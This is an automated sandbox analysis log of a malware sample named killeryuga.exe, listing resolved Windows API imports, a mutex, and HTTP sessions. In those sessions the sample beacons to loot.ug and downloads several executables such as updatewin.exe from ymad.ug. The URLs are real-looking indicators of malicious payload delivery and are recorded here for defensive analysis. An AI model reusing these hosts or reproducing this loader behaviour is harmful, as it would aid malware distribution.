Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 47
Fn
Service (2)
»
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (665)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1 milliseconds (0.001 seconds) True 407
Fn
Sleep duration = 100000 milliseconds (100.000 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:30 (UTC) True 1
Fn
Get Time type = Ticks, time = 112882 True 1
Fn
Get Time type = Performance Ctr, time = 17412281778 True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:32 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 17649686175 True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:33 (UTC) True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (8)
»
Information Value
Total Data Sent 4.08 KB
Total Data Received 5.75 MB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 95.213.139.118
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name loot.ug
Server Port 80
Username -
Password -
Data Sent 169 bytes
Data Received 285 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin1.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin1.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 2560 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin2.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin2.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 4608 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 7680 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #5
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/3.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/3.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #6
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/4.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/4.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #7
»
Information Value
User Agent Microsoft Internet Explorer
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 979.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/5.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/5.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 15
Fn
Data
Read Response size = 10240, size_out = 3072 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #8
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Process #6: killeryuga.exe
442 0
»
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x9d0
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9D4
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Module (184)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 13
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
